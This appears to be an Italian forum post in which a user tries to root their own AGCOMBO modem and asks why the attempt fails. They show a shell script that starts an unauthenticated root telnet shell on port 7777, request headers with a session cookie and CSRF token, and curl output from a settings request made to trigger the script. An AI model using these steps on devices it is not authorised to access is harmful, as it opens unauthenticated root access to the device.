Salve a tutti,
sto cercando di fare il root del modem. Queste sono le info del firmware installato:
Name of device: AGCOMBO
DSL version: A2pv6F039u.d26a
Firmware version: AGSOT_2.2.0
Bootloader Version: 1.04.0
Hardware Type & Version: V01
Ho provato a seguire le istruzioni, nello specifico ho creato il file runme:
#!/bin/sh
exec > /mnt/shares/FlashDrive/Partition1/it_worked 2>&1
set -x
ps
date
iptables -D INPUT -i ! br0 -p tcp --dport 7777 -j DROP >/dev/null 2>&1
iptables -I INPUT -i ! br0 -p tcp --dport 7777 -j DROP
/bin/telnetd -F -p 7777 -l /bin/sh&
Ho usato l'etichetta FlashDrive perché ho visto che così veniva riconosciuta la chiavetta quando viene montata nel samba o anche nella GUI.
Ho inserito la chiavetta, ho preso le informazione dei cookie con firefox, l'ho inserite nel file headers:
GET /data/overview.json?_=1707425220519&csrf_token=HK23419CC9JW4FE34E10 HTTP/1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://192.168.2.1/overview.html
Cookie: session_id=23419CC94FE34E1074636E0B; username=admin
Ho lanciato lo script, che mi ha restituito:
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 192.168.2.1:80...
* Connected to 192.168.2.1 (192.168.2.1) port 80
> POST /data/settings_content_sharing_device.json?_=1581445756953&csrf_token=HK23419CC9JW4FE34E10 HTTP/1.1
> Host: 192.168.2.1
> User-Agent: curl/8.5.0
> Accept: */*
> Cookie: session_id=23419CC94FE34E1074636E0B; username=admin
> Content-Length: 220
> Content-Type: application/x-www-form-urlencoded
>
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
HTTP/1.0 200 OK
< Content-Type: text/html
Content-Type: text/html
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
X-Frame-Options: SAMEORIGIN
< X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; mode=block
< X-XSS-Protection: 1; report=http://www.example.com/xss
X-XSS-Protection: 1; report=http://www.example.com/xss
<
* Closing connection
[ ]HTTP/1.0 200 OK
Content-Type: text/html
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=http://www.example.com/xss
[ { "network_sharing_enable": "1" } ]HTTP/1.0 200 OK
Content-Type: text/html
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=http://www.example.com/xss
[ { "device_id": "1", "device_name": "FlashDrive", "lanip": "192.168.2.1", "root_folder": "\/", "ns_content_sharing_enable": "1", "ns_require_username_password": "0", "ns_user_id": "1", "ns_share_all_folders": "1", "ns_share_folder_data": "", "dlna_sharing_enable": "", "dlna_share_all_folders": "", "dlna_share_folder_data": "" } ]
Ho provato quindi ad entrare nella condivisione per cercare il file, ma nella directory \\192.168.2.1\FlashDrive\Partition1 non ho trovato nulla se non il runme.
Sto usando Windows 7.
Cosa sto sbagliando?
Andava fatto dell'altro?